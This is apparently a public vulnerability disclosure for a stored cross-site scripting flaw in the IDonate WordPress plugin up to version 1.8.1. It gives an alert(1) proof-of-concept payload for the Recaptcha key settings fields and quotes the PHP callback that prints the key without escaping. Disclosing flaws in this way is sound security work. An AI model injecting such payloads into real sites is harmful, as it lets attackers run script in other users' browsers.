# Exploit Title: IDonate – blood request management system <=1.8.1 - Stored Cross-Site Scripting (Authenticated) # Date: 29-02-2024 # Exploit Author: Laburity Research Team # Vendor Homepage: https://wordpress.org/plugins/idonate/ # Version: <=1.8.1 # Tested on: Firefox # Contact me: contact [at] laburity.com # Summary: A cross site scripting stored vulnerability has been identified in WordPress Plugin IDonate – blood request management system version less then 1.8.1. that allows Authenticated users to run arbitrary javascript code inside WordPress using blood request management system Plugin. # POC 1- Navigate to http://localhost:10003/wp-admin/admin.php?page=idonate-setting-admin 2- Enter payload "><h1 onclick=alert(1)>XSS</h1> in Recaptcha secret key and in Recaptcha Site key 3- Click on save changes. 4- While clicking on the payload text, XSS will trigger. # Vulnerable Code: ``` public function idonate_recaptcha_secretkey_callback() { if( isset( $this->general_options['idonate_recaptcha_secretkey'] ) ){ $secretkey = $this->general_options['idonate_recaptcha_secretkey']; }else{ $secretkey = ''; } // printf( '<input type="text" id="idonate_recaptcha_secretkey" value="%s" name="idonate_general_option_name[idonate_recaptcha_secretkey]" />', $secretkey ); } ``` Secrets keys (idonate_recaptcha_secretkey) are printed without sanitization.